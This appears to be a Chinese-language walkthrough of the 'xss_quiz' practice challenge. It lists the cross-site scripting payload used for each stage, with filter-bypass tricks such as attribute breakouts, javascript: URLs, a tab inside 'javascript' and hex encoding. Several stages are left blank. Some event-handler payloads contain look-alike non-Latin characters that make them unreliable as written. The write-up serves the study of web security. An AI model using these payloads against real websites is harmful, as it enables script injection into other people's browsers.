练习地址:xss_quiz
Stage #1
<script>alert(document.domain)</script>
Stage #2
"><script>alert(document.domain)</script>
Stage #3
Stage #4
Stage #5
用firebug,删除 maxlength="15"
text box中:"><script>alert(document.domain)</script>
Stage #6
" οnmοuseοver="alert(document.domain);"
Stage #7
" οnmοuseοver=alert(document.domain);
Stage #8
javascript:alert(document.domain);
Stage #9
Hint: UTF-7 XSS提示为UTF-7,未利用成功。
Stage #10
"><script>alert(document.dodomainmain)</script>
Stage #11
"><a href="javascrip	t:alert(document.domain);">foo</a>
Stage #12
``οnmοuseοver=alert(document.domain);
(IE Only)
Stage #13
Stage #14
Stage #15
对'>' '<' 进行16进制编码
\\x3Cscript\\x3Ealert(document.domain)\\x3C/script\\x3E
Stage #16
对'>' '<' 进行Unicode编码